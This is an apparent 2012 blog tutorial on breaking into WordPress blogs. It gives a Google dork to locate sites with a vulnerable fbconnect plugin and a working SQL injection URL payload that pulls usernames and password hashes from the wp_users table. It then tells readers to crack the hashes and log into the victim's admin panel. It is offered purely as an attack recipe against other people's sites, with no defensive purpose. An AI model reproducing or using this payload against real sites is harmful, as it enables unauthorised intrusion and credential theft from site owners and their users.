Tuesday, May 15, 2012

Another Eeasy Method of wordpress Blog Hacking (Wordpress Easy Comment)

So its a New Tut of Wordpress Blog Hacking,,, Lets Start ...
Open Google.com and enter This Dork
inurl:"fbconnect_action=myhome"
[Image: untitled24.JPG]
You will find many sites, Select the site which you are comfortable with.



[Image: untitled22.JPG]
The website Url will be Like this http://www.site.com/?fbconnect_action=myhome&userid=
Now replace the ?fbconnect_action=myhome&userid= with 
?fbconnect_action=myhome&userid=
with this
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 

Now The URL will be Like this ..
www.site.com/?fbconnect_action=myhome&userid=
with this
www.site.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the User name and Password.

[Image: untitled23.JPG]
he password is encrypted with Wordpress md5 (blowfish). You need to decode this.Download And Run This Software to decode this type of password
Then find the administrator panel out. Normally it should be in
www.victrimsite.com/wp-admin

or
www.victrimsite.com/wp-login.php

[Image: untitled26.JPG]

Last Step : TYPE THE DECRYPTED USERNAME AND PASSWORD and Login In website:)